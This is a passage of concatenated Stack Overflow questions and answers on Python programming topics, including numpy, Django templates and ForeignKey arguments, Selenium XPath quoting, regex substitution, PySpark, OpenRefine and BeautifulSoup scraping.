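# [[1 2 3 1]
#  [4 5 6 2]
#  [7 8 9 3]]

np.savetxt("test.csv", out, fmt="%d", delimiter=",")
```

The 1-D `r` is placed as a column because inserting length-3 values at a single index along `axis=1` of a 3x3 array lines them up with the rows.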
How to add new column to existing csv file
38,500,090
<p>For instance, <strong>x</strong> is my data and <strong>r</strong> is supposed to be new data to be added.</p> <pre><code>import numpy as np x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]], np.int32) np.savetxt("test.csv", x, fmt='%d', delimiter=',') r = [1,2,3] </code></pre> <p>how could I add it to that <strong>"test.csv"</strong></p>
0
2016-07-21T09:21:41Z
38,518,607
<p>Isn't this just about adding a column to an existing 2d array? Writing it to a csv file is just a further step and isn't affected by this addition.</p> <pre><code>In [96]: x = np.array([[1, 2, 3], ...: [4, 5, 6], ...: [7, 8, 9]], np.int32) In [97]: r = [1,2,3] </code></pre> <p>There are a number of functions that can add a column to an array, but they all end up using <code>concatenate</code>, and knowing how to use <code>concatenate</code> directly is a good thing. The key is matching the number of dimensions.</p> <pre><code>In [98]: x1 = np.concatenate((x, np.array(r)[:,None]), axis=1) In [99]: x1 Out[99]: array([[1, 2, 3, 1], [4, 5, 6, 2], [7, 8, 9, 3]]) </code></pre> <p>The <code>np.array(r)[:,None]</code> indexing takes care of turning <code>r</code> into this column array. <code>insert</code> is more general, allowing you to add values within the existing array (not just at the end). But like <code>concatenate</code> (and all the stacks) it does not operate in-place.</p>
1
2016-07-22T05:09:47Z
[ "python", "csv", "numpy", "append" ]
Implementation of `Exception.__str__()` in Python
38,500,098
<p>I've never fully understood exception handling in Python (or any language to be honest). I was experimenting with custom exceptions, and found the following behaviour.</p> <pre><code>class MyError(Exception): def __init__(self, anything): pass me = MyError("iiiiii") print(me) </code></pre> <p>Output:</p> <pre><code>iiiiii </code></pre> <p>I assume that <code>print()</code> calls <code>Exception.__str__()</code>.</p> <p>How does the base class <code>Exception</code> know to print <code>iiiiii</code>? The string <code>"iiiiii"</code> was passed to the constructor of <code>MyError</code> via the argument <code>anything</code>, but <code>anything</code> isn't stored anywhere in <code>MyError</code> at all!</p> <p>Furthermore, the constructor of <code>MyError</code> does not call its superclass's (Exception's) constructor. So, how did <code>print(me)</code> print <code>iiiiii</code>?</p>
0
2016-07-21T09:21:55Z
38,500,203
<p>In Python 3, the <code>BaseException</code> class has a <code>__new__</code> method that stores the arguments in <code>self.args</code>:</p> <pre><code>&gt;&gt;&gt; me.args ('iiiiii',) </code></pre> <p>You didn't override the <code>__new__</code> method, only <code>__init__</code>. You'd need to override <strong>both</strong> to completely prevent from <code>self.args</code> to be set, as both implementations happily set that attribute:</p> <pre><code>&gt;&gt;&gt; class MyError(Exception): ... def __new__(cls, *args, **kw): ... return super().__new__(cls) # ignoring args and kwargs! ... def __init__(self, *args, **kw): ... super().__init__() # again ignoring args and kwargs ... &gt;&gt;&gt; me = MyError("iiiiii") &gt;&gt;&gt; me MyError() &gt;&gt;&gt; print(me) &gt;&gt;&gt; me.args () </code></pre> <p>In Python 2, exceptions do not implement <code>__new__</code> and your sample would not print anything. See <a href="https://bugs.python.org/issue1692335" rel="nofollow">issue #1692335</a> as to why the <code>__new__</code> method was added; basically to avoid issues like yours where the <code>__init__</code> method does not also call <code>super().__init__()</code>.</p> <p>Note that <code>__init__</code> is not a <em>constructor</em>; the instance is already constructed by that time, by <code>__new__</code>. <code>__init__</code> is merely the <em>initialiser</em>.</p>
1
2016-07-21T09:25:41Z
[ "python", "python-3.x", "exception" ]
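The stored-by-`__new__` behaviour described in the answer above can be checked directly in Python 3:

```python
class MyError(Exception):
    def __init__(self, anything):
        pass  # deliberately ignores `anything` and never calls super().__init__()

me = MyError("iiiiii")

# BaseException.__new__ already stashed the constructor arguments,
# even though our __init__ discarded them:
print(me.args)   # ('iiiiii',)
print(str(me))   # iiiiii  -- BaseException.__str__ falls back to args
```

So `print(me)` works because `__str__` reads `self.args`, which was populated before `__init__` ever ran.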
How do I pass a string variable with apostrophe (') in a Xpath for Python-Selenium?
38,500,189
<p>I have a web table where I need to <code>click</code> the edit template icon (the one that looks like a notepad in the image below) for each row. The table looks like this.</p> <p><a href="http://i.stack.imgur.com/gkZqk.png" rel="nofollow"><img src="http://i.stack.imgur.com/gkZqk.png" alt=""></a></p> <p>My code checks for the text and then clicks the icon. I don't have any trouble with the first two but the last one gives an error of invalid xpath expression because of the apostrophe. Below is the code that I am using. The list 'form_titles' is created dynamically by detecting the <code>.xsn</code> files that I need to upload from my local folder to each of these forms one by one. Each 'form title' has its own unique <code>.xsn</code> file and I use a spreadsheet containing a pre-compiled list for referring each <code>.xsn</code> file to its 'form title'.</p> <pre><code>form_titles = ["3.08 Incident Estimates", "3.09 Quotation by the Consultant", "3.10 Employer's Assessment"] for form in form_titles: try: WebDriverWait(browser, 60).until(EC.presence_of_element_located((By.XPATH, "//td[contains(text(),'%s')]" % (form)))) finally: browser.find_element_by_xpath("//td[contains(text(),'%s')]/following-sibling::td/a[contains(@onclick, 'editProjectFormType')]" % (form)).click() time.sleep(30) </code></pre>
2
2016-07-21T09:25:13Z
38,500,656
<p>Use double quotes (escaped as <code>\"</code> inside the Python string) to delimit the XPath string literal, so the apostrophe in the text no longer terminates it:</p> <pre><code>form_titles = ["3.08 Incident Estimates", "3.09 Quotation by the Consultant", "3.10 Employer's Assessment"] for form in form_titles: try: WebDriverWait(browser, 60).until(EC.presence_of_element_located((By.XPATH, "//td[contains(text(),\"%s\")]" % (form)))) finally: browser.find_element_by_xpath("//td[contains(text(),\"%s\")]/following-sibling::td/a[contains(@onclick, 'editProjectFormType')]" % (form)).click() time.sleep(30) </code></pre> <p>Hope it helps...:)</p>
2
2016-07-21T09:44:38Z
[ "python", "selenium", "xpath" ]
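A more general way around this, sketched here as an addition (the helper name `xpath_literal` is made up for illustration): XPath 1.0 has no escape character inside string literals, so a small function can pick whichever quote style is safe, falling back to `concat()` when the text contains both kinds of quote.

```python
def xpath_literal(text):
    """Return an XPath 1.0 string literal that safely embeds `text`."""
    if "'" not in text:
        return "'%s'" % text          # no apostrophes: single-quote it
    if '"' not in text:
        return '"%s"' % text          # apostrophes but no double quotes
    # Both quote kinds present: stitch the pieces together with concat()
    parts = text.split("'")
    return "concat(" + ", \"'\", ".join("'%s'" % p for p in parts) + ")"

xpath = "//td[contains(text(), %s)]" % xpath_literal("3.10 Employer's Assessment")
print(xpath)  # //td[contains(text(), "3.10 Employer's Assessment")]
```

This handles any of the form titles without worrying about which quote characters they contain.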
Django seems to escape HTML characters (but is not supposed to)
38,500,192
<p>After upgrading Django from 1.8 to 1.9.8 (and also upgrading a bunch of modules in the process), I've got an issue with my translations inside templates.</p> <p>With the <code>Foobar</code> key associated with the <code>foo&lt;br&gt;bar</code> string, the code:</p> <pre><code>&lt;p&gt;{% i18n 'Foobar' %}&lt;/p&gt; </code></pre> <p>was working great before the upgrade, displaying:</p> <pre><code>foo bar </code></pre> <p>But now, it displays:</p> <pre><code>foo&lt;br&gt;bar </code></pre> <p>Any idea?</p>
0
2016-07-21T09:25:16Z
38,500,881
<p>OK, thanks to Bestasttung's comment, I solved my problem with this:</p> <pre><code>{% autoescape off %} &lt;p&gt;{% i18n 'Foobar' %}&lt;/p&gt; {% endautoescape %} </code></pre> <p>But that wasn't very satisfying since I had multiple templates to update. So, I simply changed my <code>i18n</code> method from:</p> <pre><code>def i18n(context, key): ... return s </code></pre> <p>to:</p> <pre><code>def i18n(context, key): ... return mark_safe(s) </code></pre> <p>I hope that will help someone facing the same issue.</p>
1
2016-07-21T09:54:18Z
[ "python", "django", "localization", "translation" ]
Strange result of re.match()
38,500,330
<pre><code>t='1111 si debiteur' import re re.match(r"si débiteur",t) is None #gives back True as a result re.match(r"1111 si débiteur",t) is None #gives back True as a result re.match(r"1111 si débiteur",t) is not None #gives back False as a result t='8588' re.match(r"1111 si débiteur",t) is None #gives back True as a result </code></pre> <p>The thing is, I don't really get why <code>re.match(r"1111 si débiteur",t) is None</code> gives back True in both cases.</p>
-1
2016-07-21T09:30:50Z
38,500,484
<p>The value of <code>t</code>, <code>1111 si debiteur</code>, does not have an <em>accent</em>, whereas the pattern in <code>re.match(r"1111 si débiteur",t)</code> does. Since <code>é</code> never matches <code>e</code>, the match fails and <code>re.match</code> returns <code>None</code>.</p>
1
2016-07-21T09:37:27Z
[ "python" ]
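To make the mismatch concrete, and to show one possible fix via Unicode normalization, here is a hedged sketch; stripping accents is only appropriate if accent-insensitive matching is actually what you want:

```python
import re
import unicodedata

t = '1111 si debiteur'          # plain "e"
pattern = r"1111 si débiteur"   # accented "é"

print(re.match(pattern, t))     # None: 'é' never matches 'e'

def strip_accents(s):
    """Drop combining accent marks after NFD decomposition."""
    return ''.join(c for c in unicodedata.normalize('NFD', s)
                   if not unicodedata.combining(c))

print(re.match(strip_accents(pattern), t) is not None)  # True
```

Normalizing both the pattern and the subject string the same way is what makes the comparison reliable.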
Python and Neo4j first 10 Elements
38,500,384
<p>Is it possible to select the first 10 entries of a Neo4j graph, just like we do in a document-oriented database? </p>
0
2016-07-21T09:32:55Z
38,500,561
<p>When using a Cypher query, you can use the <a href="http://neo4j.com/docs/developer-manual/3.0/#query-limit" rel="nofollow"><code>LIMIT</code></a> <a href="http://neo4j.com/docs/cypher-refcard/3.0/" rel="nofollow">clause</a> to complement <code>RETURN</code>:</p> <pre><code>MATCH (n:SomeLabel) RETURN n LIMIT 10 </code></pre>
1
2016-07-21T09:40:42Z
[ "python", "neo4j" ]
New origin of imshow after set_data()
38,500,415
<p>I have a very strange problem. After setting the data of my imshow instance, the origin is changed from 'upper' to 'lower' and I did not manage to reverse it again. Any ideas?</p> <p>Here is my code:</p> <pre><code>im = ax.imshow(data) ax.set_xlim(0, new_data.shape[1]) ax.set_ylim(0, new_data.shape[0]) im.set_extent((0, new_data.shape[1], 0, new_data.shape[0])) im.set_data(new_data) </code></pre>
0
2016-07-21T09:34:35Z
38,501,842
<p>I solved it myself. Just swap the y values in <code>set_extent()</code> and leave out the <code>set_xlim</code> and <code>set_ylim</code> calls:</p> <pre><code>im = ax.imshow(data) im.set_extent((0, new_data.shape[1], new_data.shape[0], 0)) im.set_data(new_data) </code></pre>
0
2016-07-21T10:32:18Z
[ "python", "matplotlib", "rotation", "imshow" ]
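A minimal runnable sketch of the fix, using toy data and the non-interactive Agg backend: the extent is ordered (left, right, bottom, top), so putting the larger y value third and 0 last inverts the y axis and restores the 'upper'-origin look after `set_data`.

```python
import matplotlib
matplotlib.use("Agg")          # headless backend for this sketch
import matplotlib.pyplot as plt
import numpy as np

data = np.arange(12).reshape(3, 4)
new_data = np.arange(24).reshape(4, 6)

fig, ax = plt.subplots()
im = ax.imshow(data)

# (left, right, bottom, top): bottom=new height, top=0 flips the axis
# so row 0 of the array stays at the top of the image.
im.set_extent((0, new_data.shape[1], new_data.shape[0], 0))
im.set_data(new_data)

print(im.get_extent())
```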
Replace word between two substrings (keeping other words)
38,500,616
<p>I'm trying to replace a word (e.g. <code>on</code>) if it falls between two substrings (e.g. <code>&lt;temp&gt;</code> &amp; <code>&lt;/temp&gt;</code>); however, other words are present which need to be kept.</p> <pre><code>string = "&lt;temp&gt;The sale happened on February 22nd&lt;/temp&gt;" </code></pre> <p>The desired string after the replace would be:</p> <pre><code>Result = &lt;temp&gt;The sale happened {replace} February 22nd&lt;/temp&gt; </code></pre> <p>I've tried using regex, but I've only been able to figure out how to replace everything lying between the two <code>&lt;temp&gt;</code> tags (because of the <code>.*?</code>):</p> <pre><code>result = re.sub('&lt;temp&gt;.*?&lt;/temp&gt;', '{replace}', string, flags=re.DOTALL) </code></pre> <p>However, <code>on</code> may appear later in the string, not between <code>&lt;temp&gt;&lt;/temp&gt;</code>, and I wouldn't want to replace that.</p>
2
2016-07-21T09:42:51Z
38,501,144
<pre><code>re.sub('(&lt;temp&gt;.*?) on (.*?&lt;/temp&gt;)', lambda x: x.group(1)+" &lt;replace&gt; "+x.group(2), string, flags=re.DOTALL) </code></pre> <p>Output:</p> <pre><code>&lt;temp&gt;The sale happened &lt;replace&gt; February 22nd&lt;/temp&gt; </code></pre> <p><strong>Edit:</strong></p> <p>Changed the regex based on suggestions by Wiktor and HolyDanna.</p> <p>P.S: Wiktor's comment on the question provides a better solution.</p>
0
2016-07-21T10:04:29Z
[ "python", "regex" ]
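A runnable sketch of the in-place replacement idea from the answer above. The capture groups and the word boundaries around `on` are choices made here (the boundaries keep `on` from matching inside other words); note this only replaces the first `on` inside each pair of tags:

```python
import re

s = "<temp>The sale happened on February 22nd</temp> and later on it rained"

# the groups keep the surrounding text; \b stops "on" matching inside words
result = re.sub(r"(<temp>.*?)\bon\b(.*?</temp>)", r"\1{replace}\2", s, flags=re.DOTALL)
print(result)
```

The `on` outside the tags is left untouched, because matching can only start at a `<temp>`.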
Replace word between two substrings (keeping other words)
38,500,616
<p>I'm trying to replace a word (e.g. <code>on</code>) if it falls between two substrings (e.g. <code>&lt;temp&gt;</code> &amp; <code>&lt;/temp&gt;</code>) however other words are present which need to be kept.</p> <pre><code>string = "&lt;temp&gt;The sale happened on February 22nd&lt;/temp&gt;" </code></pre> <p>The desired string after the replace would be:</p> <pre><code>Result = &lt;temp&gt;The sale happened {replace} February 22nd&lt;/temp&gt; </code></pre> <p>I've tried using regex, I've only been able to figure out how to replace everything lying between the two <code>&lt;temp&gt;</code> tags. (Because of the <code>.*?</code>)</p> <pre><code>result = re.sub('&lt;temp&gt;.*?&lt;/temp&gt;', '{replace}', string, flags=re.DOTALL) </code></pre> <p>However <code>on</code> may appear later in the string not between <code>&lt;temp&gt;&lt;/temp&gt;</code> and I wouldn't want to replace this.</p>
2
2016-07-21T09:42:51Z
38,501,158
<p>Try <a href="http://lxml.de/tutorial.html" rel="nofollow"><code>lxml</code></a>:</p> <pre><code>from lxml import etree root = etree.fromstring("&lt;temp&gt;The sale happened on February 22nd&lt;/temp&gt;") root.text = root.text.replace(" on ", " {replace} ") print(etree.tostring(root, pretty_print=True)) </code></pre> <p>Output:</p> <pre><code>&lt;temp&gt;The sale happened {replace} February 22nd&lt;/temp&gt; </code></pre>
0
2016-07-21T10:05:11Z
[ "python", "regex" ]
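If lxml is not available, the same approach works with the standard library's xml.etree.ElementTree. This is a sketch that assumes the snippet is well-formed XML with a single root element, as in the question:

```python
import xml.etree.ElementTree as ET

root = ET.fromstring("<temp>The sale happened on February 22nd</temp>")
root.text = root.text.replace(" on ", " {replace} ")
result = ET.tostring(root, encoding="unicode")
print(result)
```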
Wrong python packages path for opencv cmake installation
38,500,617
<p>I've been trying to follow the opencv installation steps from <a href="http://www.pyimagesearch.com/2015/06/15/install-opencv-3-0-and-python-2-7-on-osx/" rel="nofollow">pyimagesearch.com</a> with virtualenv. Everything works fine except for the packages path: it should be <code>/Users/JLee/Envs/cv/lib/python2.7/site-packages</code> but it's configured as <code>lib/python2.7/site-packages</code>.</p> <p>In Python, <code>import cv2</code> works well in the global setting but doesn't work in the 'cv' virtual environment. </p> <p>While following the steps from the site, I first proceeded without installing virtualenv, then realized I hadn't installed it, so I installed it later and followed the steps again. Could this be a problem? </p> <pre><code> Python 2: -- Interpreter: /Users/JLee/Envs/cv/bin/python2.7 (ver 2.7.10) -- Libraries: /usr/lib/libpython2.7.dylib (ver 2.7.10) -- numpy: /Users/JLee/Envs/cv/lib/python2.7/site-packages/numpy/core/include (ver 1.11.1) -- packages path: lib/python2.7/site-packages </code></pre> <p>This is the code for cmake to configure the build:</p> <pre><code>cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local \ -D PYTHON2_PACKAGES_PATH=/Users/JLee/Envs/cv/lib/python2.7/site-packages \ -D PYTHON2_LIBRARY=/usr/local/Cellar/python/2.7.11/Frameworks/Python.framework/Versions/2.7/bin \ -D PYTHON2_INCLUDE_DIR=/usr/local/Frameworks/Python.framework/Headers \ -D INSTALL_C_EXAMPLES=OFF -D INSTALL_PYTHON_EXAMPLES=ON \ -D BUILD_EXAMPLES=ON \ -D OPENCV_EXTRA_MODULES_PATH=/Users/JLee/Developer/opencv_project/opencv_contrib/modules .. </code></pre> <p>Thanks for the help in advance!</p>
0
2016-07-21T09:42:52Z
38,524,888
<p>For some reason it looks like CMake didn't automatically determine your <code>site-packages</code> directory for your virtual environment. That's not an issue though, because all you need to do is sym-link in the <code>cv2.so</code> file.</p> <p>Find your <code>cv2.so</code> file on disk (based on your output, it seems to be in <code>lib/python2.7/site-packages</code>) and then sym-link into your Python virtual environment <code>site-packages</code> directory. From there, everything will work as expected.</p>
1
2016-07-22T11:06:06Z
[ "python", "opencv", "virtualenv", "opencv3.0", "virtualenvwrapper" ]
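When CMake guesses the packages path wrong, the exact site-packages directory of the interpreter (or virtualenv) you are running can be queried instead of typed by hand. The symlink path in the comment is an example, not your actual build output:

```python
import os
import sysconfig

# purelib is where this interpreter's installed packages live
site_packages = sysconfig.get_paths()["purelib"]
print(site_packages)

# then, in a shell (example paths, adjust to where your build put cv2.so):
#   ln -s /usr/local/lib/python2.7/site-packages/cv2.so <site_packages>/cv2.so
```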
Access column name for a specific value in GREL/Open Refine (or R, Python)
38,500,634
<p>I'm trying to access the value of a column name for a specific cell in Open Refine, so I can replace the value of the cell with the column name. I'm aware of the variable <code>row.columnNames</code> that returns ALL column names but is there a way to return just the one for the current cell?</p> <p>I'm trying to change a CSV from this:</p> <pre><code> Col 1 Col 2 Col 3 Row1 1 2 Row2 1 </code></pre> <p>to this:</p> <pre><code> Col 1 Col 2 Col 3 Row1 Col 2 Col 3 Row2 Col 1 </code></pre> <p>with a cell transformation like <code>if(value != NULL, GetColumNameForCurrentCellSomehow, NULL)</code></p> <p>If it's easier, I could also use R or Python to achieve this goal, but I have not found a straightforward way to do it there either.</p>
2
2016-07-21T09:43:22Z
38,502,862
<p>Try <code>columnName</code>:</p> <p><code>if(value != NULL, columnName, NULL)</code></p> <p>This does not seem to be documented or available under the help tab. I found it by looking at: <a href="https://github.com/OpenRefine/OpenRefine/blob/c103cdcbff49cde90409855d45f4e50b5a8349d1/main/src/com/google/refine/expr/ExpressionUtils.java#L84" rel="nofollow">https://github.com/OpenRefine/OpenRefine/blob/c103cdcbff49cde90409855d45f4e50b5a8349d1/main/src/com/google/refine/expr/ExpressionUtils.java#L84</a></p>
1
2016-07-21T11:18:54Z
[ "python", "openrefine" ]
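Since the question also allows Python, here is one way to do the same transformation with pandas. This is a sketch with made-up data: `where` keeps the empty cells and swaps every filled cell for its column's name:

```python
import numpy as np
import pandas as pd

df = pd.DataFrame(
    {"Col 1": [np.nan, 1.0], "Col 2": [1.0, np.nan], "Col 3": [2.0, np.nan]},
    index=["Row1", "Row2"],
)

# keep NaN cells as-is, replace every non-null cell with its column name
out = df.apply(lambda col: col.where(col.isna(), col.name))
print(out)
```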
Why when I compare the int values of an RDDpipeline i get both int and none values?
38,500,739
<p>I have a csv file that contains fields with the values <code>1</code> and <code>0</code>. Using pyspark I want to capture only those values with <code>1</code> in a specific field. When I convert the fields I transform them to <code>int</code>. When I use an <code>if</code> statement to check if the value is <code>1</code>, it returns a lot of <code>None</code> and some <code>1</code>s. Why do I have this problem? I am 100% sure that my csv file contains only the values <code>1</code> and <code>0</code>.</p> <pre><code>def vehA(line): fields = line.split(",") ddsA = int(fields[28]) ddsB = int(fields[52]) if ddsA == 1: return ddsA rdd = lines.map(vehA) rdd.collect() </code></pre> <p>Output:</p> <pre><code>1 1 1 1 1 1 1 None None None None 1 1 1 1 1 1 None None ... </code></pre> <p>I even tried this and I still get the same output:</p> <pre><code> if ddsA is not None: if ddsA == 1 and ddsA is not None: return ddsA </code></pre>
0
2016-07-21T09:48:21Z
38,501,019
<p>Your method <code>vehA</code> returns <code>None</code> whenever <code>ddsA</code> is not equal to <code>1</code>: since you are not returning anything in that case, Python implicitly returns <code>None</code>.</p> <p>In order to capture only the rows where <code>ddsA</code> is one, you could use <code>filter</code> instead of <code>map</code>.</p>
2
2016-07-21T09:59:21Z
[ "python", "apache-spark", "rdd", "nonetype" ]
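The behaviour is easy to reproduce in plain Python, without Spark. The `map` call below stands in for `lines.map(vehA)`, and the list comprehension plays the role `filter` would play in the answer:

```python
def vehA(value):
    if value == 1:
        return value
    # no else branch, so Python implicitly returns None for everything else

values = [1, 0, 1, 0, 1]

mapped = list(map(vehA, values))           # None appears for every non-matching element
filtered = [v for v in values if v == 1]   # only the matching elements survive

print(mapped)
print(filtered)
```

In PySpark the equivalent would be something like `lines.filter(lambda line: int(line.split(",")[28]) == 1)` (the field index is taken from the question).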
Check if there is any mail in an outlook folder received yesterday
38,501,047
<p>I need to check and verify whether any mail was received in a specific Outlook folder on the day before, using Python code.</p> <p>I am able to access the folder and read mails. But somehow, the latest mail is not read when I try the GetLast() method. I use the win32com module and the Outlook MAPI object to do this.</p> <p>Is there any way to check if there are mails received yesterday?</p>
-1
2016-07-21T10:00:28Z
38,512,170
<p>Use <code>Items.Restrict</code>:</p> <pre><code>yesterdaysItems = MAPIFolder.Items.Restrict("@SQL=(ReceivedTime &lt; '7/21/2016') AND (ReceivedTime &gt; '7/20/2016') ") </code></pre>
1
2016-07-21T18:49:23Z
[ "python", "email", "outlook", "pywin32", "win32com" ]
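Rather than hard-coding dates as in the answer above, the restriction string can be built for "yesterday" at runtime. The US month/day/year literal format is an assumption (adjust for your locale), and the Restrict call is commented out because it needs a live Outlook folder object:

```python
import datetime

today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)

fmt = "%m/%d/%Y"  # assumed DASL date literal format
restriction = "@SQL=(ReceivedTime >= '{0}') AND (ReceivedTime < '{1}')".format(
    yesterday.strftime(fmt), today.strftime(fmt)
)
print(restriction)

# with a live folder object:
# yesterdays_items = MAPIFolder.Items.Restrict(restriction)
```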
How to use selenium sending keys to this hideNameInput?
38,501,099
<p>Here are the elements; I want to input something into nameNoteId.</p> <pre><code>&lt;span class="table_n_abs" onclick="hideNameInput()" id="nameNoteId" style="top: 10px; font-size: 14px; font-family: 微软雅黑; display: block;"&gt;邮箱/手机号/帐号&lt;/span&gt; </code></pre> <p>Here is the code:</p> <pre><code>from selenium import webdriver from selenium.webdriver.common.keys import Keys import time url = 'http://passport2.chaoxing.com/login?fid=1479&amp;refer=http://i.mooc.chaoxing.com' # driver = webdriver.PhantomJS() driver = webdriver.Firefox() driver.get(url) time.sleep(1) elem = driver.find_element_by_id('passwordId') elem.send_keys('CNM') not_work_elem = driver.find_element_by_id('nameNoteId') not_work_elem.click() not_work_elem.send_keys('test') time.sleep(10) driver.close() </code></pre>
1
2016-07-21T10:02:27Z
38,501,623
<p><code>send_keys()</code> does not work here because it is a <code>span</code> element. If you want to change the <code>span</code> content you should try using <code>execute_script()</code> as below:</p> <pre><code>not_work_elem = driver.find_element_by_id('nameNoteId') driver.execute_script("arguments[0].textContent = arguments[1]", not_work_elem, "test") </code></pre> <p><strong>Edited</strong>: After looking at your website: when the span is clicked, the <code>hideNameInput()</code> function is called, which gives focus to the <code>unameId</code> input and hides the visible <code>span</code>. So you should try as below:</p> <pre><code>from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC url = 'http://passport2.chaoxing.com/login?fid=1479&amp;refer=http://i.mooc.chaoxing.com' driver = webdriver.Firefox() driver.get(url) wait = WebDriverWait(driver, 10) span = wait.until(EC.visibility_of_element_located((By.ID, "nameNoteId"))) span.click() unameId = wait.until(EC.visibility_of_element_located((By.ID, "unameId"))) unameId.send_keys('test') passwordId = wait.until(EC.visibility_of_element_located((By.ID, "passwordId"))) passwordId.send_keys('CNM') </code></pre> <p>Hope it helps...:)</p>
1
2016-07-21T10:23:22Z
[ "python", "selenium", "input" ]
Want to extract Text from HTML Document
38,501,119
<p>I want to scrape some information from <a href="https://www.kickstarter.com/discover/categories/technology?ref=discover_index" rel="nofollow">the Kickstarter website</a>. The information is structured, and the markup for every Kickstarter project looks the same:</p> <pre class="lang-html prettyprint-override"><code>&lt;div class="project-card-content"&gt; &lt;h6 class="project-title"&gt;&lt;a data-pid="714867756" data-score="null" data-version="null" href="/projects/massoudhassani/mine-kafon-drone?ref=category_recommended" target=""&gt;Mine Kafon Drone&lt;/a&gt;&lt;/h6&gt; &lt;p class="project-byline"&gt;Massoud Hassani&lt;/p&gt; &lt;p class="project-blurb"&gt; Introducing the Mine Kafon Drone, an airborne demining system developed to clear all land mines around the world in less than 10 years &lt;/p&gt; &lt;/div&gt; </code></pre> <p>I need the three following strings for every <code>&lt;div class="project-card-content"&gt;</code>. For example: </p> <ol> <li>Mine Kafon Drone</li> <li>Massoud Hassani</li> <li>Introducing the Mine Kafon Drone, an airborne demining system developed to clear all land mines around the world in less than 10 years</li> </ol> <p>For the first result I used this code in Python:</p> <pre><code>import urllib import urllib.request from bs4 import BeautifulSoup theurl = "https://www.kickstarter.com/discover/advanced?category_id=16&amp;woe_id=23424829&amp;sort=popularity&amp;seed=2448324&amp;page=1" thepage = urllib.request.urlopen(theurl) soup = BeautifulSoup(thepage,"html.parser") project1 = soup.find('div', {'class': 'project-card-content'}).findChildren('a') print (project1) </code></pre> <p>The result is: </p> <pre><code>[&lt;a data-pid="714867756" data-score="null" data-version="null" href="/projects/massoudhassani/mine-kafon-drone?ref=category_recommended" target=""&gt;Mine Kafon Drone&lt;/a&gt;] </code></pre> <p>But I only want the string <code>"Mine Kafon Drone"</code>.</p>
-1
2016-07-21T10:03:22Z
38,501,182
<p>Simply get the text from the first "a" tag you've found.</p> <pre><code>text = project1[0].text print(text) </code></pre> <p>Result would be:</p> <pre><code>Mine Kafon Drone </code></pre> <p>To get the title from every project card, use <code>find_all</code>, and note that the title lives in an <code>h6</code> tag:</p> <pre><code>data = [] for div in soup.find_all('div', class_='project-card-content'): data.append(div.find('h6', class_='project-title').text) </code></pre>
1
2016-07-21T10:05:54Z
[ "python", "html", "beautifulsoup" ]
FieldDoesNotExist error on Django production server
38,501,187
<p>After pushing my Django app to my production server I have got this error :</p> <pre><code>FieldDoesNotExist at / Class_B has no field named &lt;function DO_NOTHING at 0x7f5993ed3440&gt; </code></pre> <p>The error seems to come from a query to my database (the same PostgreSQL database that I use for my development).</p> <p>Here is a simplified version of my models.py :</p> <pre><code>class Class_B(models.Model): field1 = models.IntegerField(primary_key=True) field2 = models.TextField(blank=True, null=True) field3 = models.CharField(max_length=25) field4 = models.CharField(max_length=100, blank=True, null=True, db_index=True) class Meta: db_table = 'class_B' select_on_save = True class Class_A(models.Model): field1 = models.OneToOneField('An_other_class', db_index=True, on_delete=models.CASCADE) field2 = models.ForeignKey('Class_A', models.DO_NOTHING, db_column='field1', db_index=True, related_name='+', blank=True, null=True) class Meta: db_table = 'class_A' </code></pre> <p>The query on which the error appeared :</p> <pre><code>print(Class_A.objects.all()) </code></pre> <p>There isn't any migration to do and some queries to the database work.</p> <p>I'm using an httpd server on CentOS with mod_wsgi. My python version is 3.3 and Django 1.8.0.</p> <p>Any known solution for this error?</p>
0
2016-07-21T10:06:00Z
38,502,744
<p>Here:</p> <pre><code>field2 = models.ForeignKey('Class_A', models.DO_NOTHING, db_column='field1', db_index=True, related_name='+', blank=True, null=True) </code></pre> <p>you're passing <code>models.DO_NOTHING</code> as a positional argument instead of a named argument. This is legal in Django >= 1.9 (and will be required in Django >= 1.10), but for previous Django versions the second positional argument to <code>ForeignKey</code> is the <code>to_field</code> option, hence your error message.</p> <p>To make a long story short, you want </p> <pre><code> models.ForeignKey('Class_A', on_delete=models.DO_NOTHING, ...) </code></pre>
2
2016-07-21T11:13:23Z
[ "python", "django", "postgresql" ]
How to merge fields row-wise in a tab-delimited file with python
38,501,217
<p>These are two example rows of my tab-delimited file:</p> <pre><code>id reference_rc_001 alternative_rc_001 reference_rc_002 alternative_rc_002 reference_rc_003 alternative_rc_003 id1 0 433 0 0 69 </code></pre> <p>I would like to merge the fields of every two columns. The example output should look like this. This is a step in a Python script, so it has to be done with Python.</p> <pre><code>id reference_rc_001alternative_rc_001 reference_rc_002alternative_rc_002 reference_rc_003alternative_rc_003 id1 0433 00 690 </code></pre>
0
2016-07-21T10:06:48Z
38,504,538
<p>This looks really horrible, is probably the worst way to do this and might be about as efficient as a donkey, but..... I think it works.</p> <p>You'll need to open the file, preferably using a <code>with</code> so you can iterate across the lines in the file. (Many other SO articles will demonstrate doing that with a decent explanation so I'm not going to.)</p> <p>Then use the bit of code inside my demonstration <code>for</code> loop :</p> <pre><code>for line in file: items = line.split("\t") counters = range(len(items)/2) new_items = [items[0]] + [items[1+2*x] + items[2+2*x] for x in counters ] new_line = '\t'.join(new_items) print new_line </code></pre> <p>To explain :</p> <p>I'm splitting each line into a list (using the tab as delimiter). Then I'm creating a new list by indexing the n and n+1 elements of the list and adding them together (as strings). Finally, to recreate a line of text with tab separated entries, I'm <code>join</code>ing the new list back together with tab delimiters.</p> <p>Hopefully that gives you the pieces you might need for your solution.</p>
0
2016-07-21T12:39:32Z
[ "python", "merge", "tab-delimited" ]
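A more compact variant of the same idea, pairing the columns with zip and slicing instead of computed indices (Python 3; the sample row is invented to match the question's shape):

```python
def merge_pairs(line):
    items = line.rstrip("\n").split("\t")
    # keep the id column, then concatenate each (reference, alternative) pair
    return "\t".join([items[0]] + [a + b for a, b in zip(items[1::2], items[2::2])])

row = "id1\t0\t433\t0\t0\t69\t0"
merged = merge_pairs(row)
print(merged)
```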
How does python debugger work?
38,501,245
<p>I have a basic understanding of how a debugger works, but that is in the context of compiled languages. How does a debugger like <code>pdb</code> work? At a very high level, I am looking for something that can explain the internals of <code>pdb</code> or, in general, "debugging interpreted languages".</p> <p>I googled but couldn't find any docs. This question might be too broad, but a link to some basic documents would allow me to study further.</p>
-1
2016-07-21T10:07:49Z
38,501,376
